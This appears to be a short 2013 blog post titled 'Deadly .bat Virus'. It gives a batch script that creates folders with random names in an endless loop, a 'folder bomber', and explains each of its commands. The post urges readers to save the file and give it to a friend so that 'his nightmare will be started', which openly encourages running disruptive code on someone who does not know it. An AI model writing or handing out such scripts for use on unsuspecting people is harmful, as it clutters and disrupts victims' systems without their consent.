Oct 13, 2013

Deadly .bat Virus (create using Notepad)

Deadly .bat Virus (create using Notepad)

-:Folder Bomber:-

This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.

<code-- start do not copy>

@echo off
:top
md %random%
goto top

</code-- end do not copy >

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and %random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop

No comments: